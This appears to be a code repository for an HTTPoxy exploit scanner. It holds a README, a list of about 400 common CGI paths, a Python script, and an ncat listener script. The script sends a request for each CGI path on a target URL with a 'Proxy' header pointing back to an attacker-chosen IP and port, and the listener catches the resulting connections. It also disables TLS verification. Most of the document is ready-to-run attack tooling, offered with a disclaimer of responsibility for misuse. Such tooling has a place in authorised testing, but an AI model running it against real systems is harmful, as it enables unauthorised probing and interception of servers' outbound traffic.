├── README.md
├── cgi_list.txt
├── httpoxyscan.py
└── listener.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # HTTPoxy Exploit Scanner 
 2 | 
 3 | by 1N3 @CrowdShield (https://crowdshield.com)
 4 | Last Updated: 20160720
 5 | 
 6 | ## ABOUT: 
 7 | PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org.
 8 | 
 9 | ## REQUIREMENTS: 
10 | Requires ncat to establish reverse session
11 | 
12 | ## USAGE: 
13 | ```
14 | ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
15 | ```
16 | This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.
17 | 
18 | ## DISCLAIMER: 
19 | I take no responsibility for wrong doing or misuse of this exploit.
20 | 
21 | 


--------------------------------------------------------------------------------
/cgi_list.txt:
--------------------------------------------------------------------------------
  1 | /
  2 | /admin.cgi
  3 | /administrator.cgi
  4 | /agora.cgi
  5 | /aktivate/cgi-bin/catgy.cgi
  6 | /analyse.cgi
  7 | /apps/web/vs_diag.cgi
  8 | /axis-cgi/buffer/command.cgi
  9 | /b2-include/b2edit.showposts.php
 10 | /bandwidth/index.cgi
 11 | /bigconf.cgi
 12 | /cartcart.cgi
 13 | /cart.cgi
 14 | /ccbill/whereami.cgi
 15 | /cgi-bin/14all-1.1.cgi
 16 | /cgi-bin/14all.cgi
 17 | /cgi-bin/a1disp3.cgi
 18 | /cgi-bin/a1stats/a1disp3.cgi
 19 | /cgi-bin/a1stats/a1disp4.cgi
 20 | /cgi-bin/addbanner.cgi
 21 | /cgi-bin/add_ftp.cgi
 22 | /cgi-bin/adduser.cgi
 23 | /cgi-bin/admin/admin.cgi
 24 | /cgi-bin/admin.cgi
 25 | /cgi-bin/admin/getparam.cgi
 26 | /cgi-bin/adminhot.cgi
 27 | /cgi-bin/admin.pl
 28 | /cgi-bin/admin/setup.cgi
 29 | /cgi-bin/adminwww.cgi
 30 | /cgi-bin/af.cgi
 31 | /cgi-bin/aglimpse.cgi
 32 | /cgi-bin/alienform.cgi
 33 | /cgi-bin/AnyBoard.cgi
 34 | /cgi-bin/architext_query.cgi
 35 | /cgi-bin/astrocam.cgi
 36 | /cgi-bin/AT-admin.cgi
 37 | /cgi-bin/AT-generate.cgi
 38 | /cgi-bin/auction/auction.cgi
 39 | /cgi-bin/auktion.cgi
 40 | /cgi-bin/ax-admin.cgi
 41 | /cgi-bin/ax.cgi
 42 | /cgi-bin/axs.cgi
 43 | /cgi-bin/badmin.cgi
 44 | /cgi-bin/banner.cgi
 45 | /cgi-bin/bannereditor.cgi
 46 | /cgi-bin/bb-ack.sh
 47 | /cgi-bin/bb-histlog.sh
 48 | /cgi-bin/bb-hist.sh
 49 | /cgi-bin/bb-hostsvc.sh
 50 | /cgi-bin/bb-replog.sh
 51 | /cgi-bin/bb-rep.sh
 52 | /cgi-bin/bbs_forum.cgi
 53 | /cgi-bin/bigconf.cgi
 54 | /cgi-bin/bizdb1-search.cgi
 55 | /cgi-bin/blog/mt-check.cgi
 56 | /cgi-bin/blog/mt-load.cgi
 57 | /cgi-bin/bnbform.cgi
 58 | /cgi-bin/book.cgi
 59 | /cgi-bin/boozt/admin/index.cgi
 60 | /cgi-bin/bsguest.cgi
 61 | /cgi-bin/bslist.cgi
 62 | /cgi-bin/build.cgi
 63 | /cgi-bin/bulk/bulk.cgi
 64 | /cgi-bin/cached_feed.cgi
 65 | /cgi-bin/cachemgr.cgi
 66 | /cgi-bin/calendar/index.cgi
 67 | /cgi-bin/cartmanager.cgi
 68 | /cgi-bin/cbmc/forums.cgi
 69 | /cgi-bin/ccvsblame.cgi
 70 | /cgi-bin/c_download.cgi
 71 | /cgi-bin/cgforum.cgi
 72 | /cgi-bin/.cgi
 73 | /cgi-bin/cgi_process
 74 | /cgi-bin/classified.cgi
 75 | /cgi-bin/classifieds.cgi
 76 | /cgi-bin/classifieds/classifieds.cgi
 77 | /cgi-bin/classifieds/index.cgi
 78 | /cgi-bin/.cobalt/alert/service.cgi
 79 | /cgi-bin/.cobalt/message/message.cgi
 80 | /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
 81 | /cgi-bin/commandit.cgi
 82 | /cgi-bin/commerce.cgi
 83 | /cgi-bin/common/listrec.pl
 84 | /cgi-bin/compatible.cgi
 85 | /cgi-bin/Count.cgi
 86 | /cgi-bin/csChatRBox.cgi
 87 | /cgi-bin/csGuestBook.cgi
 88 | /cgi-bin/csLiveSupport.cgi
 89 | /cgi-bin/CSMailto.cgi
 90 | /cgi-bin/CSMailto/CSMailto.cgi
 91 | /cgi-bin/csNews.cgi
 92 | /cgi-bin/csNewsPro.cgi
 93 | /cgi-bin/csPassword.cgi
 94 | /cgi-bin/csPassword/csPassword.cgi
 95 | /cgi-bin/csSearch.cgi
 96 | /cgi-bin/csv_db.cgi
 97 | /cgi-bin/cvsblame.cgi
 98 | /cgi-bin/cvslog.cgi
 99 | /cgi-bin/cvsquery.cgi
100 | /cgi-bin/cvsqueryform.cgi
101 | /cgi-bin/day5datacopier.cgi
102 | /cgi-bin/day5datanotifier.cgi
103 | /cgi-bin/db_manager.cgi
104 | /cgi-bin/dbman/db.cgi
105 | /cgi-bin/dcforum.cgi
106 | /cgi-bin/dcshop.cgi
107 | /cgi-bin/dfire.cgi
108 | /cgi-bin/diagnose.cgi
109 | /cgi-bin/dig.cgi
110 | /cgi-bin/directorypro.cgi
111 | /cgi-bin/download.cgi
112 | /cgi-bin/e87_Ba79yo87.cgi
113 | /cgi-bin/emu/html/emumail.cgi
114 | /cgi-bin/emumail.cgi
115 | /cgi-bin/emumail/emumail.cgi
116 | /cgi-bin/enter.cgi
117 | /cgi-bin/environ.cgi
118 | /cgi-bin/ezadmin.cgi
119 | /cgi-bin/ezboard.cgi
120 | /cgi-bin/ezman.cgi
121 | /cgi-bin/ezshopper2/loadpage.cgi
122 | /cgi-bin/ezshopper3/loadpage.cgi
123 | /cgi-bin/ezshopper/loadpage.cgi
124 | /cgi-bin/ezshopper/search.cgi
125 | /cgi-bin/faqmanager.cgi
126 | /cgi-bin/FileSeek2.cgi
127 | /cgi-bin/FileSeek.cgi
128 | /cgi-bin/finger.cgi
129 | /cgi-bin/flexform.cgi
130 | /cgi-bin/fom.cgi
131 | /cgi-bin/fom/fom.cgi
132 | /cgi-bin/FormHandler.cgi
133 | /cgi-bin/FormMail.cgi
134 | /cgi-bin/gbadmin.cgi
135 | /cgi-bin/gbook/gbook.cgi
136 | /cgi-bin/generate.cgi
137 | /cgi-bin/getdoc.cgi
138 | /cgi-bin/gH.cgi
139 | /cgi-bin/gm-authors.cgi
140 | /cgi-bin/gm.cgi
141 | /cgi-bin/gm-cplog.cgi
142 | /cgi-bin/guestbook.cgi
143 | /cgi-bin/handler
144 | /cgi-bin/handler.cgi
145 | /cgi-bin/handler/netsonar
146 | /cgi-bin/hitview.cgi
147 | /cgi-bin/hsx.cgi
148 | /cgi-bin/html2chtml.cgi
149 | /cgi-bin/html2wml.cgi
150 | /cgi-bin/htsearch.cgi
151 | /cgi-bin/icat
152 | /cgi-bin/if/admin/nph-build.cgi
153 | /cgi-bin/ikonboard/help.cgi
154 | /cgi-bin/ImageFolio/admin/admin.cgi
155 | /cgi-bin/imageFolio.cgi
156 | /cgi-bin/index.cgi
157 | /cgi-bin/infosrch.cgi
158 | /cgi-bin/jammail.pl
159 | /cgi-bin/journal.cgi
160 | /cgi-bin/lastlines.cgi
161 | /cgi-bin/loadpage.cgi
162 | /cgi-bin/login.cgi
163 | /cgi-bin/logit.cgi
164 | /cgi-bin/log-reader.cgi
165 | /cgi-bin/lookwho.cgi
166 | /cgi-bin/lwgate.cgi
167 | /cgi-bin/MachineInfo
168 | /cgi-bin/MachineInfo
169 | /cgi-bin/magiccard.cgi
170 | /cgi-bin/mail/emumail.cgi
171 | /cgi-bin/maillist.cgi
172 | /cgi-bin/mailnews.cgi
173 | /cgi-bin/mail/nph-mr.cgi
174 | /cgi-bin/main.cgi
175 | /cgi-bin/main_menu.pl
176 | /cgi-bin/man.sh
177 | /cgi-bin/mini_logger.cgi
178 | /cgi-bin/mmstdod.cgi
179 | /cgi-bin/moin.cgi
180 | /cgi-bin/mojo/mojo.cgi
181 | /cgi-bin/mrtg.cgi
182 | /cgi-bin/mt.cgi
183 | /cgi-bin/mt/mt.cgi
184 | /cgi-bin/mt/mt-check.cgi
185 | /cgi-bin/mt/mt-load.cgi
186 | /cgi-bin/mt-static/mt-check.cgi
187 | /cgi-bin/mt-static/mt-load.cgi
188 | /cgi-bin/musicqueue.cgi
189 | /cgi-bin/myguestbook.cgi
190 | /cgi-bin/.namazu.cgi
191 | /cgi-bin/nbmember.cgi
192 | /cgi-bin/netauth.cgi
193 | /cgi-bin/netpad.cgi
194 | /cgi-bin/newsdesk.cgi
195 | /cgi-bin/nlog-smb.cgi
196 | /cgi-bin/nph-emumail.cgi
197 | /cgi-bin/nph-exploitscanget.cgi
198 | /cgi-bin/nph-publish.cgi
199 | /cgi-bin/nph-test.cgi
200 | /cgi-bin/pagelog.cgi
201 | /cgi-bin/pbcgi.cgi
202 | /cgi-bin/perlshop.cgi
203 | /cgi-bin/pfdispaly.cgi
204 | /cgi-bin/pfdisplay.cgi
205 | /cgi-bin/phf.cgi
206 | /cgi-bin/photo/manage.cgi
207 | /cgi-bin/photo/protected/manage.cgi
208 | /cgi-bin/php-cgi
209 | /cgi-bin/php.cgi
210 | /cgi-bin/php.fcgi
211 | /cgi-bin/ping.sh
212 | /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
213 | /cgi-bin/pollssi.cgi
214 | /cgi-bin/postcards.cgi
215 | /cgi-bin/powerup/r.cgi
216 | /cgi-bin/printenv
217 | /cgi-bin/probecontrol.cgi
218 | /cgi-bin/profile.cgi
219 | /cgi-bin/publisher/search.cgi
220 | /cgi-bin/quickstore.cgi
221 | /cgi-bin/quizme.cgi
222 | /cgi-bin/ratlog.cgi
223 | /cgi-bin/r.cgi
224 | /cgi-bin/register.cgi
225 | /cgi-bin/replicator/webpage.cgi/
226 | /cgi-bin/responder.cgi
227 | /cgi-bin/robadmin.cgi
228 | /cgi-bin/robpoll.cgi
229 | /cgi-bin/rtpd.cgi
230 | /cgi-bin/sbcgi/sitebuilder.cgi
231 | /cgi-bin/scoadminreg.cgi
232 | /cgi-bin-sdb/printenv
233 | /cgi-bin/sdbsearch.cgi
234 | /cgi-bin/search
235 | /cgi-bin/search.cgi
236 | /cgi-bin/search/search.cgi
237 | /cgi-bin/sendform.cgi
238 | /cgi-bin/shop.cgi
239 | /cgi-bin/shopper.cgi
240 | /cgi-bin/shopplus.cgi
241 | /cgi-bin/showcheckins.cgi
242 | /cgi-bin/simplestguest.cgi
243 | /cgi-bin/simplestmail.cgi
244 | /cgi-bin/smartsearch.cgi
245 | /cgi-bin/smartsearch/smartsearch.cgi
246 | /cgi-bin/snorkerz.bat
247 | /cgi-bin/snorkerz.bat
248 | /cgi-bin/snorkerz.cmd
249 | /cgi-bin/snorkerz.cmd
250 | /cgi-bin/sojourn.cgi
251 | /cgi-bin/spin_client.cgi
252 | /cgi-bin/start.cgi
253 | /cgi-bin/status
254 | /cgi-bin/status_cgi
255 | /cgi-bin/store/agora.cgi
256 | /cgi-bin/store.cgi
257 | /cgi-bin/store/index.cgi
258 | /cgi-bin/survey.cgi
259 | /cgi-bin/sync.cgi
260 | /cgi-bin/talkback.cgi
261 | /cgi-bin/technote/main.cgi
262 | /cgi-bin/test2.pl
263 | /cgi-bin/test-cgi
264 | /cgi-bin/test.cgi
265 | /cgi-bin/testing_whatever
266 | /cgi-bin/test/test.cgi
267 | /cgi-bin/tidfinder.cgi
268 | /cgi-bin/tigvote.cgi
269 | /cgi-bin/title.cgi
270 | /cgi-bin/top.cgi
271 | /cgi-bin/traffic.cgi
272 | /cgi-bin/troops.cgi
273 | /cgi-bin/ttawebtop.cgi/
274 | /cgi-bin/ultraboard.cgi
275 | /cgi-bin/upload.cgi
276 | /cgi-bin/urlcount.cgi
277 | /cgi-bin/viewcvs.cgi
278 | /cgi-bin/view_help.cgi
279 | /cgi-bin/viralator.cgi
280 | /cgi-bin/virgil.cgi
281 | /cgi-bin/vote.cgi
282 | /cgi-bin/vpasswd.cgi
283 | /cgi-bin/way-board.cgi
284 | /cgi-bin/way-board/way-board.cgi
285 | /cgi-bin/webbbs.cgi
286 | /cgi-bin/webcart/webcart.cgi
287 | /cgi-bin/webdist.cgi
288 | /cgi-bin/webif.cgi
289 | /cgi-bin/webmail/html/emumail.cgi
290 | /cgi-bin/webmap.cgi
291 | /cgi-bin/webspirs.cgi
292 | /cgi-bin/Web_Store/web_store.cgi
293 | /cgi-bin/whois.cgi
294 | /cgi-bin/whois_raw.cgi
295 | /cgi-bin/whois/whois.cgi
296 | /cgi-bin/wrap
297 | /cgi-bin/wrap.cgi
298 | /cgi-bin/wwwboard.cgi.cgi
299 | /cgi-bin/YaBB/YaBB.cgi
300 | /cgi-bin/zml.cgi
301 | /cgi-mod/index.cgi
302 | /cgis/wwwboard/wwwboard.cgi
303 | /cgi-sys/addalink.cgi
304 | /cgi-sys/defaultwebpage.cgi
305 | /cgi-sys/domainredirect.cgi
306 | /cgi-sys/entropybanner.cgi
307 | /cgi-sys/entropysearch.cgi
308 | /cgi-sys/FormMail-clone.cgi
309 | /cgi-sys/helpdesk.cgi
310 | /cgi-sys/mchat.cgi
311 | /cgi-sys/randhtml.cgi
312 | /cgi-sys/realhelpdesk.cgi
313 | /cgi-sys/realsignup.cgi
314 | /cgi-sys/signup.cgi
315 | /connector.cgi
316 | /cp/rac/nsManager.cgi
317 | /create_release.sh
318 | /CSNews.cgi
319 | /csPassword.cgi
320 | /dcadmin.cgi
321 | /dcboard.cgi
322 | /dcforum.cgi
323 | /dcforum/dcforum.cgi
324 | /debuff.cgi
325 | /debug.cgi
326 | /details.cgi
327 | /edittag/edittag.cgi
328 | /emumail.cgi
329 | /enter_buff.cgi
330 | /enter_bug.cgi
331 | /ez2000/ezadmin.cgi
332 | /ez2000/ezboard.cgi
333 | /ez2000/ezman.cgi
334 | /fcgi-bin/echo
335 | /fcgi-bin/echo
336 | /fcgi-bin/echo2
337 | /fcgi-bin/echo2
338 | /Gozila.cgi
339 | /hitmatic/analyse.cgi
340 | /hp_docs/cgi-bin/index.cgi
341 | /html/cgi-bin/cgicso
342 | /html/cgi-bin/cgicso
343 | /index.cgi
344 | /info.cgi
345 | /infosrch.cgi
346 | /login.cgi
347 | /mailview.cgi
348 | /main.cgi
349 | /megabook/admin.cgi
350 | /ministats/admin.cgi
351 | /mods/apage/apage.cgi
352 | /_mt/mt.cgi
353 | /musicqueue.cgi
354 | /ncbook.cgi
355 | /newpro.cgi
356 | /newsletter.sh
357 | /oem_webstage/cgi-bin/oemapp_cgi
358 | /page.cgi
359 | /parse_xml.cgi
360 | /photodata/manage.cgi
361 | /photo/manage.cgi
362 | /print.cgi
363 | /process_buff.cgi
364 | /process_bug.cgi
365 | /pub/english.cgi
366 | /quikmail/nph-emumail.cgi
367 | /quikstore.cgi
368 | /reviews/newpro.cgi
369 | /ROADS/cgi-bin/search.pl
370 | /sample01.cgi
371 | /sample02.cgi
372 | /sample03.cgi
373 | /sample04.cgi
374 | /sampleposteddata.cgi
375 | /scancfg.cgi
376 | /scancfg.cgi
377 | /servers/link.cgi
378 | /setpasswd.cgi
379 | /SetSecurity.shm
380 | /shop/member_html.cgi
381 | /shop/normal_html.cgi
382 | /site_searcher.cgi
383 | /siteUserMod.cgi
384 | /submit.cgi
385 | /technote/print.cgi
386 | /template.cgi
387 | /test.cgi
388 | /ucsm/isSamInstalled.cgi
389 | /upload.cgi
390 | /userreg.cgi
391 | /users/scripts/submit.cgi
392 | /vood/cgi-bin/vood_view.cgi
393 | /Web_Store/web_store.cgi
394 | /webtools/bonsai/ccvsblame.cgi
395 | /webtools/bonsai/cvsblame.cgi
396 | /webtools/bonsai/cvslog.cgi
397 | /webtools/bonsai/cvsquery.cgi
398 | /webtools/bonsai/cvsqueryform.cgi
399 | /webtools/bonsai/showcheckins.cgi
400 | /wwwadmin.cgi
401 | /wwwboard.cgi
402 | /wwwboard/wwwboard.cgi
403 | 


--------------------------------------------------------------------------------
/httpoxyscan.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # HTTPoxy Exploit Scanner by 1N3 @CrowdShield
 3 | # Last Updated: 20160720
 4 | # https://crowdshield.com
 5 | #
 6 | # ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org.
 7 | #
 8 | # REQUIREMENTS: requires ncat to establish reverse session
 9 | #
10 | # USAGE: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
11 | # *** This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.
12 | #
13 | # DISCLAIMER: I take no responsibility for wrong doing or misuse of this exploit.
14 | #
15 | 
16 | import urllib, urllib2, sys, getopt, requests, ssl, time, sys, subprocess, os
17 | from array import *
18 | from subprocess import call
19 | 
20 | ctx = ssl.create_default_context()
21 | ctx.check_hostname = False
22 | ctx.verify_mode = ssl.CERT_NONE
23 | 
24 | class bcolors:
25 |     HEADER = '\033[95m'
26 |     OKBLUE = '\033[94m'
27 |     OKGREEN = '\033[92m'
28 |     WARNING = '\033[93m'
29 |     FAIL = '\033[91m'
30 |     ENDC = '\033[0m'
31 |     BOLD = '\033[1m'
32 |     UNDERLINE = '\033[4m'
33 |     
34 | def main(argv):
35 |     argc = len(argv)
36 |     if argc < 5:
37 | 	print bcolors.OKBLUE + "         _____  _____  ___                __                 " + bcolors.ENDC
38 | 	print bcolors.OKBLUE + "  /\  /\/__   \/__   \/ _ \_____  ___   _/ _\ ___ __ _ _ __  " + bcolors.ENDC
39 | 	print bcolors.OKBLUE + " / /_/ /  / /\/  / /\/ /_)/ _ \ \/ / | | \ \ / __/ _` | '_ \ " + bcolors.ENDC
40 | 	print bcolors.OKBLUE + "/ __  /  / /    / / / ___/ (_) >  <| |_| |\ \ (_| (_| | | | |" + bcolors.ENDC
41 | 	print bcolors.OKBLUE + "\/ /_/   \/     \/  \/    \___/_/\_\\__, |\__/\___\__,_|_| |_|" + bcolors.ENDC
42 | 	print bcolors.OKBLUE + "                                    |___/                    " + bcolors.ENDC
43 | 	print bcolors.OKBLUE + "  HTTPoxy Exploit Scanner by 1N3 @ https://crowdshield.com" + bcolors.ENDC
44 | 	print bcolors.WARNING + "[*] Usage: %s http://target.com cgi_list.txt listener_ip listener_port" % (argv[0]) + bcolors.ENDC
45 | 	print ""
46 | 	sys.exit(0)
47 | 
48 |     url = argv[1] # SET TARGET URL
49 |     wordlist = argv[2] # SET CGI WORDLIST
50 |     listen_ip = argv[3] # SET LISTENER IP
51 |     listen_port = argv[4] # SET LISTENER PORT
52 |     
53 |     print bcolors.OKBLUE + "         _____  _____  ___                __                 " + bcolors.ENDC
54 |     print bcolors.OKBLUE + "  /\  /\/__   \/__   \/ _ \_____  ___   _/ _\ ___ __ _ _ __  " + bcolors.ENDC
55 |     print bcolors.OKBLUE + " / /_/ /  / /\/  / /\/ /_)/ _ \ \/ / | | \ \ / __/ _` | '_ \ " + bcolors.ENDC
56 |     print bcolors.OKBLUE + "/ __  /  / /    / / / ___/ (_) >  <| |_| |\ \ (_| (_| | | | |" + bcolors.ENDC
57 |     print bcolors.OKBLUE + "\/ /_/   \/     \/  \/    \___/_/\_\\__, |\__/\___\__,_|_| |_|" + bcolors.ENDC
58 |     print bcolors.OKBLUE + "                                    |___/                    " + bcolors.ENDC
59 |     print bcolors.OKBLUE + " + -- --=[HTTPoxy Exploit Scanner by 1N3 @ https://crowdshield.com" + bcolors.ENDC
60 |     print ""
61 |     
62 |     # READ IN CGI LIST ONE BY ONE AND APPEND TO URL
63 |     num_lines = sum(1 for line in open(wordlist))
64 |     f = open(wordlist)
65 |     lines = f.readlines()
66 |     cgi = f.read().splitlines()
67 |     f.close()
68 | 
69 |     # START PROXY LISTENER
70 |     print bcolors.WARNING + "[*] Scanning target: " + url
71 |     cmd = 'bash listener.sh ' + listen_port
72 |     os.system(cmd)
73 |     time.sleep(3)
74 |     print bcolors.WARNING + "[*] Scanning target: " + url + "" + bcolors.ENDC
75 |     num = 0
76 |     while num < num_lines:  
77 | 	# CONSTRUCT AND SEND REQUEST
78 | 	cgi_req = str(lines[num])
79 | 	req_url = url + cgi_req
80 | 	sys.stdout.write("[+] Sending request: " + req_url)
81 | 	req = urllib2.Request(req_url)
82 | 	req.add_header('Proxy', listen_ip + ":" + listen_port)
83 | 	req.add_header('User-Agent', 'HTTPoxyScan by 1N3')
84 | 	try:
85 | 		resp = urllib2.urlopen(req, context=ctx)
86 | 		content = resp.read()
87 | 	except Exception,e:
88 | 		print "Exception: "+str(e)	
89 | 	num += 1
90 | 	
91 |     print bcolors.WARNING + "[*] Scan complete!" + bcolors.ENDC
92 |     # KILL OFF ANY RUNNING NETCAT PIDS
93 |     print bcolors.WARNING + "[*] Killing reverse listener..." + bcolors.ENDC
94 |     time.sleep(5)
95 |     cmd = 'killall ncat'
96 |     os.system(cmd)
97 |     bcolors.WARNING + "[*] Done!" + bcolors.ENDC
98 |     
99 | main(sys.argv)


--------------------------------------------------------------------------------
/listener.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | killall ncat 2> /dev/null
3 | ncat -klvvp $1 &
4 | 


--------------------------------------------------------------------------------